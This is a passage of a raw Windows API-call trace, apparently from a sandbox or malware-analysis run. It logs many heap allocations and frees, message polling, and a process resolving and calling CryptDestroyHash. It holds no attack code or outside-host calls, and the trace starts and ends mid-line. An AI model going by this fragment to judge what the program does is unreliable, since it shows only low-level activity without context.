0x9b9e38 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0177.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.703] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0177.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0177.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.704] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.704] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0177.705] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0177.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0177.705] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0177.705] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0177.706] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.706] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0177.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4a0 [0177.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0177.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0177.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0177.708] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0177.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0177.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0177.708] CryptDestroyHash (hHash=0x90ae18) returned 1 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.708] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0177.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0177.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0177.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 